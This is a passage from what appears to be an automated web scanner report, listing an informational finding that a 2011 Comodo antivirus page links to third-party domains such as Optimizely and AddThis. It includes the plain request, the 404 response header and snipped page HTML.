</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.instantssl.com" rel="nofollow" target="_blank">InstantSSL</a>
...[SNIP]...
<li><a href="http://www.buyertrust.com" rel="nofollow" target="_blank">BuyerTrust</a>
...[SNIP]...
<li><a href="http://www.comodo.tv" rel="nofollow" target="_blank">Comodo TV</a>
...[SNIP]...

11.18. http://antivirus.comodo.com/click-track/NAV/Products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://antivirus.comodo.com
Path:	/click-track/NAV/Products

Issue detail

The page was loaded from a URL containing a query string:

http://antivirus.comodo.com/click-track/NAV/Products?pagelink=Global-Header

The response contains the following links to other domains:

http://cdn.optimizely.com/js/8018129.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767
http://www.buyertrust.com/
http://www.comodo.tv/
http://www.instantssl.com/

Request

GET /click-track/NAV/Products?pagelink=Global-Header HTTP/1.1
Host: antivirus.comodo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 18 Sep 2011 11:04:45 GMT
Content-Type: text/html
Connection: close
Content-Length: 8105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="//cdn.optimizely.com/js/8018129.js"></script>
...[SNIP]...
</a><a href="http://www.addthis.com/bookmark.php?v=250&username=xa-4ca0241930358767" class="addthis_button_compact" style="padding:0 0 0 3px; background:none; line-height:16px; height:16px;"></a></div>
<script type="text/javascript" src="http://s7.addth